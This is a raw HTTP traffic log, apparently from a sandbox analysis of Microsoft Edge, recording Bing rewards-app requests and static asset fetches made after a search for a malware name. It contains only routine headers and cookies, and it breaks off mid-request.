POST /rewardsapp/ncheader?ver=54406577&IID=SERP.5055&IG=C6B6495D728647ADA3098FCFDAE1CBA9 HTTP/2.0
host: www.bing.com
content-length: 4
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 770
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67d0f34f58874d9694e4a7328be090f2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-oP8Elwk8ErsKLYeLnO1BPHpt6aysjlfPhdrdsKHiRwA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67d0f34f58874d9694e4a7328be090f2|AFD:67d0f34f58874d9694e4a7328be090f2|2025-03-12T02:37:03.706Z
date: Wed, 12 Mar 2025 02:37:03 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df4a8
POST

https://www.bing.com/rewardsapp/reportActivity?IG=C6B6495D728647ADA3098FCFDAE1CBA9&IID=SERP.5065&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

88.221.135.33:443

Request

POST /rewardsapp/reportActivity?IG=C6B6495D728647ADA3098FCFDAE1CBA9&IID=SERP.5065&q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
content-length: 138
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 990
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67d0f34f9d574ab096e75cdd4b5dab50
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-s6m7yUdh9Tk+d9ehcE/GvtUfH9WvsQ28yaLITDHCOQU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67d0f34f9d574ab096e75cdd4b5dab50|AFD:67d0f34f9d574ab096e75cdd4b5dab50|2025-03-12T02:37:03.713Z
date: Wed, 12 Mar 2025 02:37:03 GMT
set-cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Thu, 12-Mar-2026 02:37:03 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2025-03-12; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df4b0
GET

https://r.bing.com/rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/fdVZU4ttbw8NDRm6H3I5BW3_vCo.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:34 GMT
etag: 0x8DCDC64A18F365B
content-length: 671
content-type: image/svg+xml
content-md5: 2e0aQjQvN2lVcUGQcPjoGA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 08fd2788-101e-0005-299e-161eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=148288
expires: Thu, 13 Mar 2025 19:48:31 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4ce
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

last-modified: Mon, 15 Aug 2022 20:49:31 GMT
etag: 0x8DA7EFFA703EB5F
content-length: 964
content-type: image/svg+xml
content-md5: iOPtPdfu4TP3P/udNrBLbw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b8d4fb37-c01e-008b-0cf0-081e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.0a7b1060.1686747743.231c1613
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=10197268
expires: Tue, 08 Jul 2025 03:11:31 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4d3
timing-allow-origin: *
GET

https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000

Response

HTTP/2.0 200

content-length: 1101
content-type: image/svg+xml
content-md5: kc0Rz8ymXPrOlhUyaNcfYw==
last-modified: Fri, 12 Aug 2022 20:45:00 GMT
etag: 0x8DA7CA3867FC831
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: adc41e54-901e-0086-2e09-15d69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.097b1060.1686747743.2aab8902
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.097b1060.1686747764.2aac12e8
akamai-grn: 0.2a7b1060.1687568922.2d70b24a
akamai-grn: 0.3d7b1060.1689052474.2206a8cd
akamai-grn: 0.21aedd58.1689771282.bd10a3b
cache-control: public, no-transform, max-age=1977719
expires: Thu, 03 Apr 2025 23:59:02 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4d2
timing-allow-origin: *
GET

https://r.bing.com/rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/c4ruj6QGsmSnOG64gJJnnnYDa44.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:41:12 GMT
etag: 0x8DCDC63E1AC19C2
content-length: 324
content-type: text/css
content-encoding: br
content-md5: zul1ioyI5qjKzvVMsqd8eQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 78028e9b-b01e-0021-58f1-1687a1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=138373
expires: Thu, 13 Mar 2025 17:03:16 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4d8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/5-y8FBmAkXLBZZghI-X94CRnsqg.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:10:08 GMT
etag: 0x8DCDC67EC841DCF
content-length: 1343
content-type: text/css
content-encoding: br
content-md5: DnViWNsgH/Vlo3SrH5gEzg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b0d2f135-b01e-004c-1989-192d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=264238
expires: Sat, 15 Mar 2025 04:01:01 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4dd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/17Kbwo14aoBIPkSeISAgHKajyeA.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
